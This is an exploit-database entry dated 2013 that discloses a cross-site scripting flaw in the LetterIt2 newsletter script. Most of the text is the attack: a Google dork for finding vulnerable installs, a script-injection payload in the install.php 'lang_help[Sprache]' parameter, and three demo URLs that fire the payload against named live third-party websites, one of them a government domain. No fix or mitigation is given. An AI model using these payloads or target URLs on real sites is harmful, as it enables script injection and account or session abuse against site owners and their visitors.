id: 20638
date: 04/10/2013
title: LetterIt2 <=  XSS Vulnerability
author: GoLd_M
cves: 

# LetterIt2 <=  XSS Vulnerability
# Date: 10/04/2013
# Author: GoLd_M / Page FaceBook (https://www.facebook.com/wthkker/)
# Vendor: http://www.letterit.de/download/letterit2_070726.tar.gz
# Version: 2.070726
# Category:: XSS Vulnerability
# Google Dork: © 2007 www.otterware.de Helge Orthmann
# Tested on: Xp SP 2
# Ex :[LetterIt2]//help/install.php?lang_help[Sprache]="><script>alert(1);</script>
# Demo:
# 01 :http://iz.sp.gov.br/stats/help/install.php?lang_help[Sprache]=%22%3E%3Cscript%3Ealert%281337%29;%3C/script%3E
# 02 :http://newsletter.lidstromer.com/help/install.php?lang_help[Sprache]=%22%3E%3Cscript%3Ealert%281%29;%3C/script%3E
# 03 :http://www.oestivador.com.br/cont/help/install.php?lang_help[Sprache]=%22%3E%3Cscript%3Ealert%281%29;%3C/script%3E

#  0day.today [2023-03-26]  #